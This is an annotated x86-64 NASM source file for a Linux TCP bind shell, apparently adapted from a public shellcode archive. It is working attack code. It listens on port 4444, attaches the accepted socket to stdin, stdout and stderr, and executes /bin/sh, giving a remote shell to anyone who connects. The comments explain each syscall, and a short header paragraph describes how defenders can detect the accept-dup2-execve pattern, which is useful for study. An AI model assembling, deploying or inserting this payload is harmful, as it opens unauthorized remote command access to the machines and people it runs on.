;;;;; original code: http://shell-storm.org/shellcode/files/shellcode-858.php
;-----------------------------------------------------------------------
; Linux x86-64 TCP bind shell (NASM, Intel syntax, raw `syscall`).
;
; Observable behaviour, in order (each step is one Linux syscall):
;   socket(AF_INET, SOCK_STREAM, 0)
;   bind(fd, {AF_INET, port 4444, INADDR_ANY}, 16)
;   listen(fd, 1)
;   accept(fd, NULL, NULL)
;   dup2(client, 2); dup2(client, 1); dup2(client, 0)
;   execve("/bin//sh", ["/bin//sh", NULL], [NULL])
;
; Register conventions used throughout: rax = syscall number / result,
; rdi/rsi/rdx = args 1..3. `syscall` clobbers only rcx and r11, which is
; why rdi (listening fd) and rdx are reused across phases without being
; reloaded. No return value is ever checked: a failing socket()/bind()
; (e.g. port already in use) still falls through to the next syscall.
;
; For defenders the distinctive sequence is: an unexpected process
; opening a listener on TCP/4444 on all interfaces, then an accept()
; followed immediately by dup2() of the accepted socket onto fds 0-2 and
; execve() of /bin/sh with an empty environment (argv[0] "/bin//sh").
; Syscall auditing (auditd/seccomp) on that accept->dup2->execve chain,
; and inventory of listening sockets vs. expected services, both catch it.
;-----------------------------------------------------------------------
global _start
section .text
_start:
;;;;; syscall socket()
;   rax = 41 (socket); rdi = AF_INET; rsi = SOCK_STREAM; rdx = protocol 0
xor rax,rax
add al, 0x29  ;41: SYS_socket (rax zeroed first, only al written)
xor rdi,rdi
add rdi,0x2  ;2: AF_INET
xor rsi,rsi
inc rsi  ;1: SOCK_STREAM
xor rdx,rdx  ;0: protocol (IPPROTO_IP / default) -- NOT INADDR_ANY; the address is built on the stack below
syscall
mov rdi,rax  ;rdi = listening socket fd, kept as arg 1 for bind/listen/accept
;;;;syscall bind()
;   Build struct sockaddr_in on the stack (grows down, so fields are pushed last-first):
;     sin_family=AF_INET, sin_port=htons(4444), sin_addr=0.0.0.0, sin_zero
xor rax, rax
push rax
push rax  ;16 zero bytes: sin_addr = INADDR_ANY (0.0.0.0) + sin_zero padding (8 more than needed, harmless)
push word 0x5C11  ;sin_port: 4444 = 0x115C, stored network byte order -> bytes 11 5C
push word 0x02  ;sin_family: 2 = AF_INET
mov rsi,rsp  ;rsi = &sockaddr_in
add rdx,0x10  ;16: sizeof(struct sockaddr_in); relies on rdx still being 0 from the socket() setup
add al, 0x31  ;49: SYS_bind (rax is 0 here, so this is the full number)
syscall
;;; syscall listen
;   rdi still holds the listening fd (syscall does not clobber rdi)
xor rax,rax
add al, 0x32  ;50: SYS_listen
xor rsi,rsi
inc rsi  ;1: backlog
syscall
;;;; syscall accept
;   accept(fd, NULL, NULL): peer address is not requested
xor rax,rax
add al, 0x2b  ;43: SYS_accept
xor rsi,rsi  ;addr = NULL
mov rdx,rsi  ;addrlen = NULL
syscall
mov r15,rax  ;r15 = accepted client fd (r15 survives the dup2 loop and is the value redirected to stdio)
;;;;; dup2() syscall
;   dup2(client, newfd) for newfd = 2, 1, 0 so the shell's stdin/stdout/stderr are the socket
xor rsi,rsi
add rsi, 0x02  ;rsi = newfd counter, starts at 2 (stderr) and counts down to 0 (stdin)
mov rdi, r15  ;oldfd = accepted client socket
loop:  ;NOTE(review): `loop` is also an x86 mnemonic; if the assembler in use rejects it as a label, a non-mnemonic name is the fix -- confirm with the target nasm version
xor rax,rax
add al,0x21  ;33: SYS_dup2 (rax reset every iteration because syscall overwrites it with the result)
syscall
dec rsi  ;next lower fd; SF set once rsi goes 0 -> -1
jns loop  ;loop while rsi >= 0 (iterations: 2, 1, 0)
;;;;; Syscall execve()
;   execve(path, argv, envp) with path="/bin//sh", argv={path, NULL}, envp={NULL}
;   All three structures are assembled on the stack; r9 is used as a zero source.
xor rax, rax
add rax, 59  ;59: SYS_execve
xor r9, r9  ;r9 = 0, pushed wherever a NULL / terminator is needed
push r9  ;NUL terminator for the path string
mov rbx, 0x68732f6e69622f2f  ;"/bin//sh" as a little-endian qword (bytes appear reversed in the immediate); double slash pads to 8 bytes
push rbx  ;path string now at [rsp], NUL-terminated by the qword pushed above
mov rdi, rsp  ;rdi = path = "/bin//sh"
push r9  ;NULL
mov rdx, rsp  ;rdx = envp = {NULL}  (empty environment)
push rdi  ;argv[0] = path; the NULL pushed just before is argv[1]
mov rsi, rsp  ;rsi = argv = {"/bin//sh", NULL}
syscall